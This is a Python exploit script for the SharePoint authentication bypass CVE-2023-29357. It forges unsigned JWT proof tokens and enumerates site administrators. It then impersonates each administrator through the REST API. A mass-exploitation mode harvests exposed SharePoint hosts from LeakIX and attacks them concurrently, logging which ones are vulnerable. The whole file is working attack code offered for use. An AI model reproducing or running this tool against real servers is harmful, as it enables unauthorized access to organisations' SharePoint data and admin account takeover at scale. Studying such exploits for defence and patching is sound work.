import json import time import base64 import requests import argparse from rich.console import Console from urllib.parse import urlparse from typing import Union, List, Dict from alive_progress import alive_bar from leakpy.scraper import LeakixScraper from concurrent.futures import ThreadPoolExecutor, as_completed from requests.packages.urllib3.exceptions import InsecureRequestWarning console = Console() requests.packages.urllib3.disable_warnings(InsecureRequestWarning) class SharePoint: client_id = "00000003-0000-0ff1-ce00-000000000000" def __init__(self, url: str, verbose: bool): self.url = url.rstrip('/') self.hostname = urlparse(url).hostname self.verbose = verbose if self.verbose: console.print("[+] URL:", self.url, style="bold green") console.print("[+] Hostname:", self.hostname, style="bold green") self.realm = self.get_realm() self.aud = self.construct_aud_field() def get_realm(self) -> str: headers = {"Authorization": "Bearer "} response = requests.get(self.url + '/_api/web/siteusers', headers=headers, verify=False, timeout=3) if response.status_code != 401: console.print("[-] Unable to retrieve realm", style="bold red") if self.verbose else None raise Exception("Unable to retrieve realm") www_authenticate_header = response.headers.get('WWW-Authenticate', '') if www_authenticate_header: realm = None for header in www_authenticate_header.split(','): if 'realm="' in header: try: realm = header.split('realm="')[1].split('"')[0] break except IndexError: continue if self.verbose: console.print("[+] Realm:", realm, style="bold green") return realm def construct_aud_field(self) -> str: aud = f"{self.client_id}@{self.realm}" if self.verbose: console.print("[+] Aud Field:", aud, style="bold green") return aud def spoof_admin_users(self, admin_users: List[Dict[str, str]]) -> None: current_time = int(time.time()) expiration_time = current_time + 3600 for user in admin_users: payload = { "aud": self.aud, "iss": self.client_id, "nbf": current_time, "exp": expiration_time, "ver": "hashedprooftoken", "nameid": user.get("NameId", ""), "nii": user.get("NameIdIssuer", ""), "endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=", "endpointurlLength": 1, "isloopback": True, "isuser": True } header = {"alg": "none"} encoded_header = base64.urlsafe_b64encode(json.dumps(header).encode()).rstrip(b'=') encoded_payload = base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=') jwt_token = f"{encoded_header.decode()}.{encoded_payload.decode()}.AAA" headers = { "Accept": "application/json", "Authorization": f"Bearer {jwt_token}", "X-PROOF_TOKEN": jwt_token, } endpoint_url = self.url.strip() + '/_api/web/currentuser' response = requests.get(endpoint_url, headers=headers, verify=False, timeout=5) if response.status_code == 200: try: parsed_response = json.loads(response.text) console.print(f"[+] Spoofing succeeded for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'", style="bold green") console.print(json.dumps(parsed_response, indent=4), style="bold green") except json.JSONDecodeError: console.print(f"[+] Spoofing succeeded for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'", style="bold green") console.print(f"Received non-JSON response:\n{response.text}", style="bold yellow") else: console.print(f"[-] Spoofing failed for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'. Status code: {response.status_code}", style="bold red") def create_jwt_token(self) -> str: header = {"alg": "none"} current_time = int(time.time()) expiration_time = current_time + 3600 payload = { "aud": self.aud, "iss": self.client_id, "nbf": int(current_time), "exp": int(expiration_time), "ver": "hashedprooftoken", "nameid": f'{self.client_id}@{self.realm}', "endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=", "endpointurlLength": 1, "isloopback": True } encoded_header = base64.urlsafe_b64encode(json.dumps(header).encode()).rstrip(b'=') encoded_payload = base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=') jwt_token = f"{encoded_header.decode()}.{encoded_payload.decode()}.AAA" if self.verbose: console.print("[+] JWT Token:", jwt_token, style="bold green") return jwt_token def authenticate_with_token(self, token: str) -> Union[bool, List[Dict[str, str]]]: headers = { "Accept": "application/json", "Authorization": f"Bearer {token}", "X-PROOF_TOKEN": token, } response = requests.get(self.url + '/_api/web/siteusers', headers=headers, verify=False, timeout=5) if self.verbose: console.print("[!] Attempting authentication for", self.url, "with token", style="bold yellow") if response.status_code == 200: try: parsed_response = json.loads(response.text) users = parsed_response.get('value', []) admin_users = [user for user in users if user.get('IsSiteAdmin', False) is True] admin_info_list = [] for user in admin_users: admin_info = { "Title": user.get('Title', 'N/A'), "Email": user.get('Email', 'N/A'), "NameId": user.get('UserId', {}).get('NameId', 'N/A'), "NameIdIssuer": user.get('UserId', {}).get('NameIdIssuer', 'N/A') } admin_info_list.append(admin_info) console.print(f"[+] Authenticated successfully for {self.url}\n", style="bold green") if self.verbose and admin_users: for admin_info in admin_info_list: console.print(json.dumps(admin_info, indent=2), style="bold green") console.print("=+"*20, style="bold green") return admin_info_list if admin_info_list else True except json.JSONDecodeError: if self.verbose: console.print(f"[+] Authenticated successfully for {self.url} but failed to parse the response text as JSON\nResponse Text: {response.text}", style="bold yellow") return True else: if self.verbose: console.print("[-] Authentication failed for", self.url, ". Status code:", response.status_code, style="bold red") return False def check_url(url: str, output_file: str = None, verbose: bool = False, mass_exploit: bool = False): try: sp = SharePoint(url, verbose=verbose) jwt_token = sp.create_jwt_token() authenticated = sp.authenticate_with_token(jwt_token) if authenticated: if output_file: with open(output_file, 'a') as file: file.write(f"{url}\n") if not mass_exploit and isinstance(authenticated, list): sp.spoof_admin_users(authenticated) except Exception as e: if verbose: console.print("[!] Error in check_url:", str(e), style="bold red") def fetch_from_leakix(fields="protocol, host, port", bulk=False, pages=2): LEAKIX_API_KEY = "" # Configure this line with your LeakIX Pro API Key to use LeakPy if LEAKIX_API_KEY == "": console.print("[bold red]Please configure the Leakix API key.[/bold red]") exit(1) scraper = LeakixScraper(api_key=LEAKIX_API_KEY, verbose=True) results = scraper.execute( scope="leak", query='+plugin:SharePointPlugin', fields=fields, pages=pages, use_bulk=bulk, ) url_dict = {} for result in results: protocol = result.get("protocol") host = result.get("host") port = result.get("port") url = f"{protocol}://{host}:{port}" url_dict[url] = None return list(url_dict.keys()) def main(): parser = argparse.ArgumentParser(description='Mass tester for SharePoint CVE-2023–29357 Authentication Bypass.') parser.add_argument('-u', '--url', type=str, help='The base url for the requests', required=False) parser.add_argument('-l', '--list', type=str, help='File containing a list of base urls to scan', required=False) parser.add_argument('-t', '--threads', type=int, help='Number of threads to use', default=10) parser.add_argument('-o', '--output', type=str, help='File to output vulnerable urls', default='output.txt') parser.add_argument('-v', '--verbose', action='store_true', help='Print verbose output', default=False) parser.add_argument('--leakpy', action='store_true', help="Use Leakix to fetch URLs based on leaks") parser.add_argument('--bulk', action='store_true', help="Use bulk_mode on LeakIX (Pro API Key only)") parser.add_argument('--pages', type=int, default=2, help="Page results on LeakIX") args = parser.parse_args() urls = [] if args.leakpy: urls = fetch_from_leakix(bulk=args.bulk, pages=args.pages) elif args.list: with open(args.list, 'r') as file: urls = [line.strip() for line in file.readlines()] elif args.url: urls = [args.url] if urls: if (len(urls) > 1 and (args.leakpy or args.list)): with ThreadPoolExecutor(max_workers=args.threads) as executor, alive_bar(len(urls), bar='smooth', enrich_print=False) as bar: futures = {executor.submit(check_url, url, args.output, args.verbose, mass_exploit=True): url for url in urls} for future in as_completed(futures): bar() else: check_url(urls[0], args.output, args.verbose, mass_exploit=False) else: console.print("[red]Please provide a url or a file with a list of base urls to scan.[/red]") if __name__ == "__main__": main()